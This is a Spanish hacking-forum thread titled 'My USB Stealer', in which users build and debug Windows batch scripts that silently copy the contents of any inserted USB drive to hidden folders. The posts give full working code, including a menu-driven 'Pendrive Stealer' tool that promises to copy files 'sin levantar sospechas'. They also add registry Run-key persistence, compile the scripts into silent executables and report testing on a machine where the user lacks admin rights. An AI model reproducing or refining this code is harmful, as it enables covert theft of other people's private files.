guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas:
He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versión este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahí estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que después le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se está usando.
Pregunta: ¿No hay alguna forma de que ese mensaje no salte?
El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo así y hasta que no le doy a finalizar programa no se reinicia el ordenaodr
Pregunta: ¿esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga.

Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ¿así lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado:

Código:

@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
	MD C:\z23856\b3637\eviews47\
	goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automáticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando.

Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicación) sigue copiando archivos de los pen drive que se introduzcan: ¿Como se desinstala esta aplicación completamanete?. Además me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ¿esto esta relacionado no?

Conclusión: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura.
Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ¿como se introduce en el codido que te he puesto?.
Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje.

editado-
perdona si soy pesado pero que deberia eliminar del code para que sólo copiara la unidad g o sólo la e??? He probado combinaciones y no me funciona gracias

Título: Re: My USB Stealer
Publicado por: WestOn en 20 Noviembre 2008, 19:44 pm

Wenas, para q se ejecute al inicio:

Código:

Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NombreEtiqueta /t  REG_SZ /d "UbicacionArchivo" /f

NombreEtiqueta:Lo que tu quieras.
UbicacionArchivo:Ubicacion del archivo q se iniciara al inicio :P

Respecto a lo de q solo 'detecte' las unidades G y E puedes hacer esto:

Código:

@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)

un saludo ;)

PD:El programa Xcopy.exe es lo que hace que puedas copiar archivos de tu USB a la carpeta o viceversa.

Título: Re: My USB Stealer
Publicado por: estudcom en 20 Noviembre 2008, 20:39 pm

gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code:

Código:

@echo off
  
If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha)
 
:betha 
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t  REG_SZ /d "C:\z23856\2.exe" /f
goto alpha
 
:alpha
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto echeck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sólo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que quería saber es cual seria el code para que copie sólo la unidad e, He creado este pero no funciona:

Código:

@echo off

If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I

Quizas podrías crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\

Título: Re: My USB Stealer
Publicado por: 8789poli en 21 Noviembre 2008, 17:31 pm

Cita de: :: SmartGenius :: en 3 Octubre 2008, 05:25 am

Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compañero Rockox...

(http://img177.imageshack.us/img177/936/splashusbstealer2rr4.th.jpg)
(http://img379.imageshack.us/img379/9263/splashusbstealerig6.jpg)

Código:

@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ±±±±±                                               ±±±±±
echo      ±±°°°°°±                                            ±±°°°°°±
echo      ±°°°°°°°±±                                         ±°°°°°°°± 
echo    ±±°°°°°°°°°±                                        ±±°°°°°°°°±±
echo   ±°°°°°°°°°°°±                                      ±±°°°°°°°°°°°°±
echo   ±°°°°°°°°°°°°±±            ²²²²²²²²²²²²²²²²²²   ±±±°°°°°°°°°°°°°°±
echo    ±±°°°°°°°°°°°°±±±     ²²²²±±°°°°°°°°°°°°±±²²²²±°°°°°°°°°°°°±±±±±
echo      ±±±±±±°°°°°°°°°±²²²²°°°°°°°°°°°°°°°°°°°°°°²²²²°°°°°°±±±±±
echo            ±±±°°°°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²±
echo                 ²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°±±²²
echo                ²²°°°°°°°°°°²²²²°°°°°°°°²²²²°°°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°°±²²²²°°°°°°°±²²²²°°°°°°°°°°°²²
echo                ²²±±°°°°°°°°°°°°°°±±±±°°°°°°°°°°°°°°°°²²
echo                 ²²²°°°°°°°°°°°°°°²²²²°°°°°°°°°°°°°°²²²²
echo                ±±²²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±±°°°°²²±°°°°°°°°°°°°°°°°°°°°°°°°°°²²°°°°°°±±
echo            ±±±°°°°°°°²²²²°°°°°°°°°°°°°°°°°°°°°²²²°°°°°°°°°°±±±±±±±
echo      ±±±±±±°°°°°°°°±±²  ²²²°°°°°°°°°°°°°°°°°°²²  ±±°°°°°°°°°°°°°°°±±
echo    ±±°°°°°°°°°°°°±±       ²°°°°°°°°°°°°°°°°°°²     ±±±±°°°°°°°°°°°°°±
echo    ±°°°°°°°°°°°±±         ²°°°°°°°°°°°°°°°°°°²         ±±°°°°°°°°°°±±
echo    ±±°°°°°°°°±±           ²°°±°°±°°±°°±°°±°°°²          ±°°°°°°°°±±
echo      ±±°°°°°±±            ²²²²²²²²²²²²²²²²²²²²          ±±°°°°°°±
echo        ±°°°±±                                             ±°°°°±
echo         ±±±±                                               ±±±±
echo.
echo              ²²² ²²² ²²  ²²²    ²² ²² ²²² ² ² ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ² ² ² ² ² ² ² ²   ²  ² ²
echo              ²   ² ² ² ² ²²² ²² ²   ² ²²² ²²  ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ²   ² ² ² ² ² ²   ²  ²   ²
echo              ²²² ²²² ²²  ²²²    ²   ² ² ² ² ² ²²² ²  ² ²²²
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Definir carpeta principal...³  ³2³ ³ Tipos de Archivos..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Iniciar Escaneo de USBs...  ³  ³4³ ³ Ayuda del Programa.. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa..        ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Documentos...  ³  ³2³ ³ Imagenes ^& Fotos..       ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Musica ^& Audio ³  ³4³ ³ Documentos ^& Imagenes..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Videos *       ³  ³6³ ³ Todas las Opciones... *  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de 
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
  
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan

Código:

@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.

Que cosa mas presiosa :D
me encanto XD

Título: Re: My USB Stealer
Publicado por: corax en 21 Noviembre 2008, 19:40 pm

Vamos a ver que os estáis liando un poco...

Te aclaro lo que intentabais averiguar WestOn y tú...

Para añadir nuevas unidades al chequeo hay que seguir este patrón:

· Escaneamos la primera unidad (P.E: la E)
· Si existe, pasamos a la fase de copiado de esa unidad
· Si no existe, pasamos a la fase de chequeo de la unidad siguiente
· Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
· Cuando lleguemos a la última unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.

De otro modo no funcionará.

Respecto al proceso XCOPY.exe que estaba en ejecución... si te fijas en el código se hace referencia al xcopy. ¿Qué es esto? Pues es un archivo ejecutable que funciona a través de la cmd y cuya función es copiar, en este caso el contenido íntegro de las memorias flash.

Si en vez de copiarlo todo sólo quieres copiar un cierto tipo de archivos, cambia la parte del código (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensión del tipo de archivos que quieras copiar. Puedes usar varias líneas para copiar distintos tipos de archivo. Me explico:

En caso de que quisieras copiar archivos de PowerPoint, cambiarías esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I

Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I

Y así para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I

Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de más de ocho letras o con espacios, o extensiones de más de tres letras (Formato 8/3) debes entrecomillar la ruta completa.

Respecto a que las memorias flash se puedan extraer de forma segura... la única forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sólo puedes extraer una memoria flash de forma segura cuando no se está copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.

En cuanto a lo de que no se deja reiniciar, es porque el programa está haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:

Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no añade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opción de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)

Respecto a lo de la desinstalación... debes borrar el ejecutable que hayas creado MIENTRAS ESTÉ PARADO (de lo contrario borras el archivo, pero éste sigue cargado en memoria, es decir, ejecutándose), y además la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.

Bueno, si te queda alguna duda, házmelo saber y trataré de responderte.

Nos vemos ;)

PD: 8789poli, si te gusta el código se lo agradeces por privado la próxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.

Venga, a cuidarse todos...

Título: Re: My USB Stealer
Publicado por: SmartGenius en 22 Noviembre 2008, 23:57 pm

Hay una cosa que se os esta lvidadno y es que el code siempre va a estar en ejecucion y copiando cosas de las unidades a menos que pongan algo que le diga que ya debe dejar de hacerlo....

Por ejemplo...el hace el Escaneo de las unidades C....Z y empieza a copiar, luego por ejemplo tenemos una USB en la unidad H, el pasa y al encontrarla hace lo debido de copiar los datos, despues sigue con las demas unidades pero como ya no hay mas pues vuelve a empezar el ciclo y vuelve a recopiar todo lo de la unidad H y asi sucesivamente, por eso es que no se las deja expulsar porque sigue siendo usada......en eso ya habia pensado y es por eso que agregue algo de comprobacion en la siguiente parte...

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB >%letra%:\db.ini
goto :eof

asi cuando vaya a esa unidad simplemente la ignora porque ya fue analizada y se libra dle problema de que esta siendo usada, aunque en alguna proxima ocasion podria ser cambiado el contenido de dicha unidad y el programa no podria funcionar por lo que habria que hacer ya un chekeo por fecha de la creacion del archivo de comprobacion, pero no debe ser muy dificil...

aparte otra cosas en la que deben mejorar el codigo es en la comprobacion de las unidades USB...

Miren el codigo de la V2...

Código

@echo off
title USB Stealer
REM Motor de Escaneo de USBs
REM Coded by :: SmartGenius ::
 
:ini
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder="%%a"
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
if exist "scan.exit" exit
goto main
 
:main
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if not exist "%%n:\RECYCLER" call :usb %%n)
goto ini
 
:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>"%letra%:\db.ini"
goto :eof

Cualquier duda pueden postearla que con gusto les ayudare..

Saludos.

Título: Re: My USB Stealer
Publicado por: corax en 23 Noviembre 2008, 16:57 pm

Excelente, SmartGenius, creo que eso era lo que faltaba.

Muchas gracias.

Nos vemos ;)

Título: Re: My USB Stealer
Publicado por: estudcom en 27 Noviembre 2008, 14:51 pm

joe muchisimas gracias de verdad ya he conseguido todo lo que queria y gracias a vosotros. Solo tengo una preguntilla mas (la ultima de verdad). He probado en un ordenador en el que no tengo privilegios de administrador el programa y he metido mi pen drive. Ha copiado perfectamente todo a una carpeta en c como queria. como ya he visto que funciona he borrado el programa completamente del ordenador. El problema es que ahora quiero borrar los archivos de mi pen drive que se copiaron al ordenador y me salta la ventana de error, de que se estan usando o algo así. He reiniciado el ordenador y he vuelto a iniciar sesion y sigo sin poder borrarlos. Conoceis alguna forma efectiva de borrar carpetas y archivos? He utilizado estos tres programas y me dicen que no pueden borrarlos.
Unlocker
File assesin
Killerbox

Puede ser que ya no pueda borrarlos nunca a no ser que se formatee el ordenador?. Os digo que no tengo privilegios de administrador y por si eso influyera he pasado la carpeta de c donde se copio todo a mis documentos porque en mis documentos si puedo borrar cosas que copie de mi pen, pero tampoco me deja. Lo que quiero decir es que en el ordenador puedo borrar archivos perfectamente (escepto lo de archivos de programa) con lo que no entiendo porque no me deja borrar estos. Muchas gracias por todo aunque no puedan ayudarme

Título: Re: My USB Stealer
Publicado por: corax en 27 Noviembre 2008, 20:31 pm

hola estudcom,

en principio esos archivos deberían poder borrarse de manera perfectamente normal, y más utilizando herramientas como el KillBox o el Unlocker... si a pesar de usarlas no has podido borrar los archivos, inténtalo con el Clean Disk Security.
Puedes encontrarlo aquí:

http://www.theabsolute.net/sware/clndisk.html

Una vez instalado presiona con el botón derecho del ratón sobre la carpeta de archivos que quieras borrar y selecciona "erase fully".

Es un truco que me ha funcionado a veces cuando los archivos se ponen rebeldes y no consigo que funcione el Unlocker.

Si no te funciona háznoslo saber y encontraremos una solución.

Hasta pronto!

Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: corax en 1 Octubre 2008, 18:26 pm